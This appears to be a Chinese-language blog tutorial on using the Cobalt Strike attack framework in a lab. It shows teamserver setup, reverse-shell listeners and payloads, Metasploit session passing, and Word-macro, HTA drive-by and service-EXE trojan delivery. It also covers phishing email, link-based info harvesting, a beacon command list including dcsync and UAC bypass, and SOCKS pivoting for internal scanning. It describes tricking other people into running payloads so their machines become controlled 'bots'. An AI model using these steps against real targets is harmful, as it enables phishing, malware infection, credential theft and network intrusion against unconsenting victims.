Cobalt strike简介
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。它是渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。
Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上。当然你知道利用这款工具主要用于内网渗透以及APT攻击。
实验环境:
1. 服务器端(Linux):192.168.60.6
2. 靶机(windows):192.168.60.65
3. 使用cobalt strike 4
4. 实验步骤
一.启动,连接服务器
- 启动服务端:
- 关键的文件是teamserver以及cobaltstrike.jar,将这两个文件放到服务器上同一个目录,然后运行
- 设置权限为777
chmod 777 teamserver
- test 为待会靶机连接服务器的密码
**./teamserver 192.168.60.6 test**
- 客户端连接服务器
客户端在Windows、Linux、Mac下都可以运行 (需要配置好Java环境)。启动Cobalt Strike客户端,输入服务端的IP以及端口、连接密码,用户名可以任意设置。
运行:cobalstrike.bat
启动客户端,输入ip,密码,端口,用户默认
成功连上服务器
如果客户端 是Linux操作系统则运行以下命令,启动客户端:
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.
jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
二.让主机上线
- 创建监听器
点击 Cobalt Strike -> Listeners->Add,其中内置了八个Payload,
wndows/beacon_dns/reverse_dns_txt
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https
windows/beacon_bind_pipe
windows/beacon_tcp
windows/beacon_extc2
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/beacon为内置监听器,包括dns、http、https、smb、tcp、extc2六种方式的监听器;windows/foreign为外部监听器。
- 创建payload 让主机上线
- 运行该exe主机成功上线:可以查看上线主机的磁盘信息,进行端口扫描,查看进程等信息。同理如果将生成的artifact.exe作为附件发送给其他人,只要有人点击,则他的机器会上线。
可以查看上线主机的磁盘信息,进行端口扫描,查看进程等信息。同理如果将生成的artifact.exe作为附件发送给其他人,只要有人点击,则他的机器会上线。不过现在的电脑都装 了杀毒软件,所以payload需做免杀。这个后续在研究。
三. 结合metasploit,反弹shell
在kali中使用命令开启metasploit,然后设监听端口,我这里设置的是65端口,可以任意设置
**msfconsole**
在靶机中
使用Cobalt Strike创建一个windows/foreign/reverse_http的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。
选中刚刚新建msf
这样我们就可以利用metaspliot中的相关工具,进行进一步渗透。
如果有其他的主机上线,在派生会话中选择msf,该上线主机也能反弹shell,这样我们就可以利用metaspliot中的相关工具,进行进一步渗透。
四.office宏payload应用
第一步、生成office宏
第二步,把cs生成的代码放到word宏里面去
注意:做试验的时候,宏的位置不要设置所有的活动模板和文档,建设应用在当前文档,不然本机所有word文档运行都会种上你的木马,另外打开word文档有宏提示,一般是word默认禁用所有宏(文件—选项—信任中心—信任中心设置里面配置)。
当别人运行该word,就会成为肉鸡上线。
五.Https Payload应用
优点:可能过行为查杀、另外administrator运行可直接提升为system权限
第一步、生成木马,选择Windows service EXE
第二步:创建服务
Sc create test binpath= ”c:\test.exe” start= auto displayname= ”test”
Sc start test
Sc delete test
Sc top test
六.信息收集
1、打开信息收集然后输入想伪造的地址
2、然后就可以生成一个地址
3、可以通过https://bitly.com生成url短链接
http://tool.chinaz.com/tools/dwz.aspx
4、当别人访问这个链接的时候,就可以在应用信息里看到他的一些信息
七.hta网页挂马
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。
下例代码保存为xx.hta:
This is my first homepage.
This text is bold
第一步:生成hta
第二步:使用文件下载
点击开始之后,evil.hta文件会自动传到cs uploads目录。
如果之前设置过钓鱼页面,记得一定要删掉,不然会克隆的时候会报错
当别人访问的时候就会来到伪造的百度界面,从而下载小马。
八.邮件钓鱼
1、打开邮件钓鱼界面
2、注意,目标邮件内容
3、输入邮箱地址,邮件内容,附件等内容
九.beacon控制台的基本使用
beacon控制台的基本使用
基本参数:
beacon> help
Beacon Commands
------- -----------
**argue** //进程参数欺骗
**blockdlls** // 阻止子进程加载非Microsoft DLL
**browserpivot** //注入受害者浏览器进程
**bypassuac** // 绕过UAC提升权限
**cancel** // 取消正在进行的下载
**cd** //切换目录
**checkin** //强制让被控端回连一次
**clear** // 清除beacon内部的任务队列
**connect** // Connect to a Beacon peer over TCP
**covertvpn** // 部署Covert VPN客户端
**cp** //复制文件
**dcsync** //从DC中提取密码哈希
**desktop** // 远程桌面(VNC)
**dllinject** // 反射DLL注入进程
**dllload** //使用LoadLibrary将DLL加载到进程中
**download** //下载文件
**downloads** // 列出正在进行的文件下载
**drives** //列出目标盘符
**elevate** // 使用exp
**execute** //在目标上执行程序(无输出)
**execute-assembly** // 在目标上内存中执行本地.NET程序
**exit** //终止beacon会话
**getprivs** // Enable system privile
十.Socks代理应用
第一步:设置代理端口
第二步:查看已搭建代理
第三步:利用msf模块直接攻击
setg Proxies socks4:192.168.0.106:6677
也可以使用下面方法:
开启socks4a代理,通过代理进行内网渗透
开启socks,可以通过命令,也可以通过右键Pivoting->SOCKS Server
beacon> socks 2222
[+] started SOCKS4a server on: 2222
[+] host called home, sent: 16 bytes
然后vim /etc/proxychains.conf ,在文件末尾添加socks4代理服务器
使用proxychains代理扫描内网主机 proxychains nmap -sP 192.168.183.0/24
## 十一.cs提权与内网渗透
脚本下载地址:
https://github.com/rsmudge/Elevatekit
https://github.com/k8gege/aggressor //k8内网渗透,提权
https://k8gege.org/Download/
插入脚本
